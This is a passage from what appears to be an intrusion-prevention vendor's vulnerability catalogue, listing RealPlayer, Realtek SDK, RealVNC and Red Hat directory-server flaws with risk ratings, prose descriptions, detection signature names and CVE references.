First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer; RealPlayer SP
Type: Malfunction
Description: A code execution vulnerability exists in RealNetworks RealPlayer ActiveX control. The vulnerability is due access to uninitialized memory during processing of CDDA URIs. An attacker can leverage this vulnerability by enticing a target user to open a crafted web file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation: HTTP_SS-RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution
File-Text_RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution
References:
CVE-2010-3747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3747
BID-44144
http://www.securityfocus.com/bid/44144
Back to top

RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer; RealPlayer SP
Type: Integer Overflow
Description: Two remote code execution vulnerabilities exists in RealNetworks RealPlayer. The vulnerabilities are due to two integer overflow errors while parsing the ECMA Array and the Strict Array type data in FLV files. An attacker can leverage this vulnerability by enticing a target user to open a crafted IVR file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation: HTTP_SS-RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities
File-Flash_RealNetworks-RealPlayer-FLV-Parsing-Integer-Overflow
References:
CVE-2010-3000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3000
BID-42775
http://www.securityfocus.com/bid/42775
Back to top

RealNetworks-RealPlayer-Ivr-Handling-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in RealNetworks RealPlayer. The vulnerability is due to lack of input validation when parsing IVR files. The application uses a 32-bit value provided in the file as the size of the buffer that should be allocated. An attacker can exploit this vulnerability by enticing a target user to open a malicious file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation: File-Binary_RealNetworks-RealPlayer-Ivr-BOF
File-Text_RealPlayer-Vulnerable-Embedded-ActiveX-Control
Back to top

RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in RealNetworks RealPlayer
Risk: High
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer; RealOne Player; RealPlayer Enterprise
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in RealNetworks' RealPlayer. The vulnerability is related to errors in processing overly long Lyrics3 v2.00 tags in MP3 files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted MP3 file. Successful exploitation causes a heap-based buffer overflow that can be used to execute arbitrary code within the privileges of the logged in user.
Situation: HTTP_SS-RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow
File-Binary_RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow
References:
CVE-2007-5080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5080
BID-26214
http://www.securityfocus.com/bid/26214
Back to top

RealNetworks-RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: Moderate
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer
Type: Integer Overflow
Description: There is an integer underflow vulnerability in RealPlayer's handling of MPEG movies. The vulnerability is caused when the application subtracts one from a user controlled value that is then used as a loop iterator. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted MPEG file. Successful exploitation can lead to the injection and execution of arbitrary code in the context of the currently logged in user.
Situation: File-MPEG_RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption
References:
CVE-2011-4259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4259
BID-50741
http://www.securityfocus.com/bid/50741
OSVDB-77280
http://www.osvdb.org/77280
Back to top

RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in RealPlayer
Risk: High
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: RealPlayer
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in RealNetworks' RealPlayer application. The vulnerability is due to a signedness error when handling playlist names. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow
HTTP_SS-RealNetworks-RealPlayer-Playlist-Handling-Exploit
File-Text_RealNetworks-RealPlayer-Playlist-Handling-Exploit
References:
CVE-2007-5601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5601
BID-26130
http://www.securityfocus.com/bid/26130
Back to top

RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks Mac RealPlayer
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer
Type: Buffer Overflow
Description: A heap buffer overflow exists in RealNetworks RealPlayer. The vulnerability is due to insufficient bounds checking while copying user-supplied data into a fixed-length buffer. This can lead to a buffer overflow and subsequent memory corruption. A remote attacker can exploit this vulnerability by enticing a user to download and process a malicious QCP file with a vulnerable version of the application. A successful attack would result in the execution of attacker-controlled code in the security context of the current user.
Situation: File-RIFF_RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow
References:
CVE-2011-2950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2950
BID-49172
http://www.securityfocus.com/bid/49172
Back to top

RealNetworks-RealPlayer-RecordClip-Parameter-Injection

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer
Type: Input Validation
Description: There is a code execution vulnerability in RealNetworks RealPlayer ActiveX control. The vulnerability is due to an injection of a specific character into the arguments passed to the RecordClip method. An attacker can leverage this vulnerability by enticing a target user to open a crafted web file. Successful exploitation would allow an attacker to download arbitrary command files on the target host. This may potentially lead to arbitrary code execution.
Situation: HTTP_SS-RealNetworks-RealPlayer-RecordClip-Parameter-Injection
File-Text_RealNetworks-RealPlayer-RecordClip-Parameter-Injection
References:
CVE-2010-3749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3749
BID-44443
http://www.securityfocus.com/bid/44443
Back to top

RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption

About this vulnerability: A vulnerability in RealNetworks' RealPlayer
Risk: High
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer
Type: Malfunction
Description: There is a memory corruption vulnerability in the RealNetworks RealPlayer ActiveX control. The control is implemented in rmoc3260.dll. The flaw is due to a boundary error in the set/get mechanism of certain properties of these controls. Remote attackers can exploit this vulnerability by persuading the target user to view a malicious web page. Successful attack can allow for arbitrary code execution with the privileges of the currently logged on user.
Situation: HTTP_SS-RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption
File-Text_RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption
References:
CVE-2008-1309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1309
BID-28157
http://www.securityfocus.com/bid/28157
Back to top

RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: Moderate
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer
Type: Buffer Overflow
Description: There is a heap buffer overflow in RealNetworks RealPlayer. The vulnerability is due an error when handling RMP files, overly long values for certain tags can result in a heap buffer overflow. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open a crafted RMP file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Text_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
File-TextId_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
References:
CVE-2013-6877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6877
BID-64398
http://www.securityfocus.com/bid/64398
OSVDB-101135
http://www.osvdb.org/101135
Back to top

RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: High
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer
Type: Buffer Overflow
Description: A stack buffer overflow exists in RealNetworks RealPlayer. The vulnerability is due an error when handling RMP files. Incorrect handling of the 'version' and 'encoding' attributes of the XML declaration tag can result in a stack buffer overflow. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open a crafted RMP file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-TextId_RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow
References:
CVE-2013-7260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7260
BID-64398
http://www.securityfocus.com/bid/64398
OSVDB-101356
http://www.osvdb.org/101356
Back to top

RealNetworks-RealPlayer-SMIL-XSS

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer
Type: Cross-site Scripting
Description: An XSS (Cross Site Scripting) Vulnerability exists in the RealPlayer's handling of SMIL (Synchronized Multimedia Integration Language) metafiles. This allows a malicious entity to attack vulnerable RealPlayer clients. A similar vulnerability was discovered in August 2003; the current issue is a variant of its predecessor. The attacked target will execute the malicious Javascript bundled with the SMIL file. This may allow the attacker to access sensitive data on the victims local system, such as cookie information for a particular website. It could also download to the victim other resources specified by the attacker. The saved files could be used by other exploits, which could in turn be used to mount further attacks.
Situation: File-TextId_JavaScript-In-SMIL-XSS
References:
CVE-2003-0726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0726
BID-8453
http://www.securityfocus.com/bid/8453
Back to top

RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks Rhapsody Player
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the RealNetworks RealPlayer product. The vulnerability is specific to parsing malformed Macromedia Flash (SWF) files. An attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged in user. In an attack attempt which results in successful code execution, the process flow of the vulnerable application will be diverted to attacker supplied code. The result of such an attack is entirely dependent on the purpose of the injected code. In an unsuccessful attack attempt, the affected application will terminate. It should be noted that due to the nature of the flaw, an attack will generally be unsuccessful in injecting and executing code.
Situation: File-Flash_RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow
References:
CVE-2006-0323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323
BID-17202
http://www.securityfocus.com/bid/17202
Back to top

RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: Moderate
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in RealNetworks RealPlayer. The vulnerability is due to insufficient sanitation of the URLs while parsing RealMedia files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted Microsoft .url file, possibly embedded in a web page, that has an extension associated with RealPlayer such as .ram or .ra, with the affected application. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user. Unsuccessful exploitation could result in the application terminating abnormally.
Situation: File-TextId_RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow
References:
CVE-2012-5691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5691
BID-56956
http://www.securityfocus.com/bid/56956
OSVDB-88486
http://www.osvdb.org/88486
Back to top

RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Helix Community Helix Player
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Helix Player
Type: Malfunction
Description: There is a flaw in the way RealPlayer processes files encoded using the WAVE format. The vulnerability occurs when RealPlayer attempts to parse a crafted WAV file with an incorrect LIST chunk. An attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged in user. When code injection and execution are successful, the behavior of the target system depends on the nature the injected code. Any code injected into the vulnerable component executes in the security context of the current user. If code injection fails, the RealPlayer application will likely terminate.
Situation: File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow
File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow-Over-SMTP
References:
CVE-2005-0611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0611
BID-12697
http://www.securityfocus.com/bid/12697
Back to top

RealNetworks-SMIL-Wallclock-Stack-Overflow

About this vulnerability: A stack overflow vulnerability in RealNetworks Helix Player and RealPlayer
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Helix Player; RealPlayer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in RealNetworks Helix Player and RealPlayer. The vulnerability is due to the way these products parse a specific time format in Synchronized Multimedia Integration Language (SMIL) data. A remote attacker can exploit this vulnerability by persuading the target user to visit a malicious website or open a crafted file. Successful exploitation can allow execution of arbitrary code in the context of the logged-in user.
Situation: HTTP_RealNetworks-SMIL-Wallclock-Stack-Overflow
File-TextId_RealNetworks-SMIL-Wallclock-Stack-Overflow
References:
CVE-2007-3410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3410
BID-24658
http://www.securityfocus.com/bid/24658
OSVDB-37374
http://www.osvdb.org/37374
Back to top

RealPlayer-Malformed-RM-File-Heap-Overflow

About this vulnerability: A vulnerability in RealPlayer
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer
Type: Buffer Overflow
Description: A vulnerability exists in the way that RealNetworks RealPlayer products handle specially crafted media files. An RM media file containing a very large data segment length, when opened by a vulnerable player, can cause a heap-based buffer to be overrun . An attacker exploiting this vulnerability can execute arbitrary code or cause a denial of service.
Situation: File-Binary_RealPlayer-Malformed-RM-File-Heap-Overflow
References:
BID-11309
http://www.securityfocus.com/bid/11309
Back to top

RealPlayer-Url-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in RealPlayer
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer
Type: Buffer Overflow
Description: There is a vulnerability in the way RealNetworks' RealPlayer products handle the parsing of URLs. A heap buffer overflow can occur when parsing a URL with a large number of period characters. Using a specially crafted URL, an attacker can exploit this vulnerability to remotely execute arbitrary code.
Situation: File-Text_RealPlayer-Url-Parsing-Buffer-Overflow
References:
CVE-2004-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0550
BID-10527
http://www.securityfocus.com/bid/10527
Back to top

RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution

About this vulnerability: A vulnerability in RealNetworks RealPlayer
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer; RealPlayer SP
Type: Buffer Overflow
Description: A vulnerability has been reported in RealNetworks's Realplayer.
Situation: HTTP_SS-RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution
File-RIFF_RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution
References:
CVE-2010-4393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4393
BID-46047
http://www.securityfocus.com/bid/46047
OSVDB-70682
http://www.osvdb.org/70682
Back to top

Realtek-Media-Player-Playlist-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Realtek Media Player.
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Realtek Media Player
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Realtek Media Player 1.15.0.0 which allows remote attackers to execute arbitrary code via a crafted playlist.
Situation: File-Binary_Realtek-Media-Player-Playlist-Buffer-Overflow
References:
CVE-2008-5664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5664
BID-32860
http://www.securityfocus.com/bid/32860
OSVDB-50715
http://www.osvdb.org/50715
Back to top

Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395

About this vulnerability: A vulnerability in Realtek SDK
Risk: High
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Platform: Generic
Software: Realtek SDK
Type: Code Injection
Description: A command execution vulnerability has been reported in the Realtek SDK web management interface. This vulnerability is due to formSysCmd form feature which allows users to run system commands. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.
Situation: HTTP_CRL-Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395
References:
CVE-2021-35395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35395
Back to top

Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395

About this vulnerability: A vulnerability in Realtek SDK
Risk: High
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: Realtek SDK
Type: Input Validation
Description: A command injection vulnerability has been reported in the Realtek SDK web management interface via formWsc's peerPin parameter. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.
Situation: HTTP_CRL-Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395
References:
CVE-2021-35395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35395
Back to top

Realtek-SDK-Miniigd-OS-Command-Injection

About this vulnerability: A Realtek SDK miniigd OS Command Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: Realtek SDK
Type: Code Injection
Description: Realtek SDK using the miniigd SOAP service are vulnerable to OS command injections via a crafted NewInternalClient request.
Situation: HTTP_CRL-Realtek-SDK-Miniigd-OS-Command-Injection
File-TextId_Realtek-SDK-Miniigd-OS-Command-Injection
References:
CVE-2014-8361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361
Back to top

Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394

About this vulnerability: A vulnerability in Realtek SDK
Risk: High
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: Realtek SDK
Type: Input Validation
Description: A command injection vulnerability has been reported in the Realtek SDK diagnostic tool MP Daemon. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.
Situation: Generic_UDP-Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394
References:
CVE-2021-35394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35394
Back to top

Realtek-SDK-SIP-ALG-Buffer-Overflow

About this vulnerability: A vulnerability in the Realtek SDK
Risk: High
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Platform: Generic
Software: Realtek SDK
Type: Input Validation
Description: Impoper processing of SIP messages causes a buffer overflow in products with code from the Realtek SDK. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: SIP-UDP_Realtek-SDK-SIP-ALG-Buffer-Overflow
References:
CVE-2022-27255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27255
Back to top

Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395

About this vulnerability: A vulnerability in Realtek SDK
Risk: High
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: Realtek SDK
Type: Buffer Overflow
Description: Multiple stack-based buffer overflow vulnerabilities have been reported in the Realtek SDK web management interface. A successful exploitation of these vulnerabilities may allow an unauthenticated attacker to execute arbitrary code.
Situation: HTTP_CRL-Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395
References:
CVE-2021-35395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35395
Back to top

Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392

About this vulnerability: A vulnerability in Realtek SDK
Risk: High
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: Realtek SDK
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in the Realtek SDK via UPnP SUBSCRIBE Callback header. A successful exploitation of this vulnerability may allow an unauthenticated attacker to execute arbitrary code.
Situation: HTTP_CSH-Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392
References:
CVE-2021-35392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35392
Back to top

RealVNC-Authentication-Bypass

About this vulnerability: Authentication bypass vulnerability in RealVNC
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealVNC Free Edition; RealVNC Personal Edition; RealVNC Enterprise Edition
Type: Malfunction
Description: RealVNC server has a vulnerability in the authentication process. The server does not correctly validate the authentication method chosen by the client. A remote attacker is able to exploit this vulnerability to connect to a RealVNC server without authentication.
Situation: RFB-Client-Bad-Handshake-Message-Sequence
RFB-Client-Bad-Security-Option
Generic_RealVNC-Authentication-Required
Generic_RealVNC-Connection-Attempt-Without-Authentication
Generic_RealVNC-Authentication-Bypass-Command-Execution
References:
CVE-2006-2369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2369
BID-17978
http://www.securityfocus.com/bid/17978
OSVDB-25479
http://www.osvdb.org/25479
Back to top

RealVNC-Server-ClientCutText-Message-Memory-Corruption

About this vulnerability: A vulnerability in RealVNC
Risk: High
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealVNC
Type: Malfunction
Description: There is a vulnerability in RealVNC Server. The vulnerability is due to insufficient boundary checks when handling ClientCutText messages sent from RealVNC clients. Remote authenticated attackers could exploit this vulnerability by sending a crafted ClientCutText VNC command. Successful exploitation of this vulnerability may lead to injection and execution of arbitrary code within the context of SYSTEM user.
Situation: RFB_CS-RealVNC-Server-ClientCutText-Message-Memory-Corruption
Back to top

Recslurp-Botnet

About this vulnerability: Recslurp botnet
Risk: High
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Recslurp is a malicious spambot.
Situation: Generic_SS-Recslurp-Botnet-Traffic
Generic_CS-Recslurp-Botnet-Traffic
Back to top

Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service

About this vulnerability: A vulnerability in Red Hat 389 Directory Server
Risk: Moderate
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1654-5242
Platform: Generic
Software: Red Hat 389 Directory Server
Type: Malfunction
Description: There has been reported a denial-of-service vulnerability in 389 Directory Server. Successful exploitation of the vulnerability could lead to denial of service conditions.
Situation: LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service
LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service-2
References:
CVE-2018-14648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14648
Back to top

Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow

About this vulnerability: A vulnerability in Red Hat 389 Directory Server
Risk: High
First detected in: sgpkg-ips-1131-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat 389 Directory Server
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been discovered in 389 Directory Server. The vulnerability is due to improper handling of overly long filter values within ldapsearch queries. A remote attacker can issue a crafted query in order to trigger the vulnerability and cause cause arbitrary code execution with the privileges of the ns-slapd daemon. An unsuccessful attack will cause the ns-slapd daemon to abnormally terminate.
Situation: LDAP_CS-Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow
References:
CVE-2018-1089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1089
BID-104137
http://www.securityfocus.com/bid/104137
Back to top

Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service

About this vulnerability: A vulnerability in Red Hat 389 Directory Server
Risk: Moderate
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat 389 Directory Server
Type: Input Validation
Description: Improper processing of LDAP search queries that specify the server-side-sort extension causes a denial of service vulnerability in Red Hat 389 Directory Server. A successful exploit allows an attacker to terminate the service.
Situation: LDAP_CS-Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service
References:
CVE-2018-10935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10935
Back to top

Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion

About this vulnerability: A vulnerability in Red Hat 389 Directory Server
Risk: High
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1296-5242
Platform: Red Hat Linux
Software: Red Hat 389 Directory Server
Type: Resource Starvation
Description: A vulnerability in Red Hat 389 Directory Server, versions 1.4.1.2 and before, which allows remote attackers to cause a denial of service condition by sending a large number of LDAP requestsover TLS to a vulnerable server causing all the worker threads to be blocked, due to improper processing of LDAP requests over TLS.
Situation: TLS_CS-Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion
References:
CVE-2019-3883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3883
Back to top

Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service

About this vulnerability: A vulnerability in Red Hat 389 Directory Server
Risk: Moderate
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat 389 Directory Server
Type: Input Validation
Description: Improper use of the lock controlling the error log causes a denial of service vulnerability in Red Hat 389 Directory Server.
Situation: LDAP_CS-Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service
References:
CVE-2018-14624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14624
Back to top

Red-Hat-Cachemgr-Cgi-Script

About this vulnerability: Red Hat Squid cachemgr.cgi script
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Red Hat Linux 6
Software: Squid; Apache
Type: Insecure Configuration
Description: Red Hat Linux 5.2 and 6.0 have the cachemgr.cgi script accessible from the Squid proxy by default. This script can be used to scan other hosts for open ports from the vulnerable host, which may also be located behind a firewall.
Situation: HTTP_CSU-Redhat-Apache-Cachemgr-Cgi
References:
CVE-1999-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0710
BID-2059
http://www.securityfocus.com/bid/2059
Back to top

Red-Hat-CloudForms-Management-Engine-Directory-Traversal

About this vulnerability: A Red Hat CloudForms Management Engine Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat CloudForms
Type: Directory Traversal
Description: Multiple directory traversal vulnerabilities in Red Hat CloudForms Management Engine 2.0 which allow remote attackers to create and overwrite arbitrary files via the filename parameter to the log, upload, or linuxpkgs method.
Situation: HTTP_CRL_Red-Hat-CloudForms-Management-Engine-Directory-Traversal
References:
CVE-2013-2068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2068
Back to top

Red-Hat-CloudForms-Management-Engine-SQL-Injection

About this vulnerability: A Red Hat CloudForms Management Engine SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Red Hat CloudForms
Type: Input Validation
Description: A vulnerability in Red Hat CloudForms Management Engine, version 2.0, which allows remote attackers to access and modify data via SQL injections in the profile parameter in the explorer action.
Situation: HTTP_CSU-SQL-Injection-End-Of-Line-Comments
References:
CVE-2013-2050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2050
BID-64524
http://www.securityfocus.com/bid/64524
Back to top

Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Red Hat Directory Server
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Red Hat Directory Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Red Hat Directory Server. The flaw is due to improper data validation in the Administrator Web Interface component. A remote attacker can trigger this vulnerability by sending crafted HTTP request to the affected service, potentially inject and execute arbitrary code with root level privileges. In a sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, which is normally the root. In an attack case where code injection is not successful, the affected CGI application will terminate abnormally.
Situation: HTTP_CSH-Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow
References:
